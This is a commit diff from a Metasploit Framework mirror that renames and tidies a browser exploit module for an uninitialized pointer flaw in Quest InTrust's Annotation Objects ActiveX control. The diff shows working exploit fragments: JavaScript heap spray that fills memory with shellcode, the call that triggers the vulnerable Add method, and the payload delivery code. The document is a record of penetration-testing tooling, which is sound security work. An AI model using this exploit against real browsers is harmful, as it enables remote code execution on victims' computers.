infosecn1nja
/
metasploit-framework
mirror of https://github.com/infosecn1nja/metasploit-framework.git
1
0
Fork 0
Code Issues Packages Projects Releases Wiki Activity

Module rename. Cleanup whitespace. Fix typos.

unstable
sinn3r 2012-04-12 01:30:01 -05:00
parent 14f85e406f
commit 0d739a1a51
1 changed files with 54 additions and 55 deletions
Show Stats Download Patch File Download Diff File Expand all files Collapse all files

31
modules/exploits/windows/browser/annotation_objects_uninitialized_pointer_rce.rb → modules/exploits/windows/browser/intrust_annotatex_add.rb
View File

@ -1,7 +1,3 @@
##
# $Id$
##
###
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
@ -18,32 +14,31 @@ class Metasploit3 < Msf::Exploit::Remote
def initialize(info = {})
super( update_info(info,
'Name' => 'Quest InTrust Annotation Objects uninitialized pointer remote code execution',
'Name' => 'Quest InTrust Annotation Objects Uninitialized Pointer',
'Description' => %q{
This module exploits a uninitialized variable vulnerability in the
This module exploits an uninitialized variable vulnerability in the
Annotation Objects ActiveX component. The activeX component loads into memory without
opting into ALSR so this module exploits the vulnerability against windows Vista and
Windows 7 targets. A large heap spray is required to fulfil the requirement that EAX
points to part of the rop chain in a heap chunk and the calculated call will hit the
pivot in a seperate heap chunk. This will take some time in the users browser.
Windows 7 targets. A large heap spray is required to fulfill the requirement that EAX
points to part of the ROP chain in a heap chunk and the calculated call will hit the
pivot in a separate heap chunk. This will take some time in the users browser.
},
'License' => MSF_LICENSE,
'Author' =>
[
'rgod <rgod[at]autistici.org>', # initial discovery & poc
'mr_me <steventhomasseeley[at]gmail.com>', # msf module
'mr_me <steventhomasseeley[at]gmail.com>' # msf module
],
'Version' => '$Revision$',
'References' =>
[
[ 'OSVDB', '80662'],
[ 'BID', '52765'],
[ 'URL', 'http://www.exploit-db.com/exploits/18674/'],
[ 'URL', 'http://www.exploit-db.com/exploits/18674/']
],
'DefaultOptions' =>
{
'EXITFUNC' => 'process',
'InitialAutoRunScript' => 'migrate -f',
'InitialAutoRunScript' => 'migrate -f'
},
'Payload' =>
{
@ -114,8 +109,6 @@ class Metasploit3 < Msf::Exploit::Remote
end
end
print_status("Target selected: #{my_target.name}") if datastore['VERBOSE']
# Re-generate the payload.
return if ((p = regenerate_payload(cli)) == nil)
@ -141,6 +134,7 @@ class Metasploit3 < Msf::Exploit::Remote
memory = new Array();
for (i=0;i<1000;i++){ memory[i] = block+shellcode; }
}
function main(){
heapspray();
#{obj_name}.Add(#{my_target.ret},1);
@ -211,15 +205,19 @@ class Metasploit3 < Msf::Exploit::Remote
var data = payload;
while(data.length < 100000) { data += data; }
var onemeg = data.substr(0, 64*1024/2);
for (i=0; i<14; i++) {
onemeg += data.substr(0, 64*1024/2);
}
onemeg += data.substr(0, (64*1024/2)-(38/2));
var block = new Array();
for (i=0; i<700; i++) {
block[i] = onemeg.substr(0, onemeg.length);
}
}
function main(){
heapspray();
#{obj_name}.Add(#{my_target.ret},1);
@ -245,7 +243,8 @@ class Metasploit3 < Msf::Exploit::Remote
</html>
EOF
print_status("Sending #{self.name} to #{cli.peerhost}:#{cli.peerport}...")
peer = "#{cli.peerhost.ljust(16)} #{self.shortname}"
print_status("#{peer} Sending HTML...")
#Remove the extra tabs from content
content = content.gsub(/^\t\t/, '')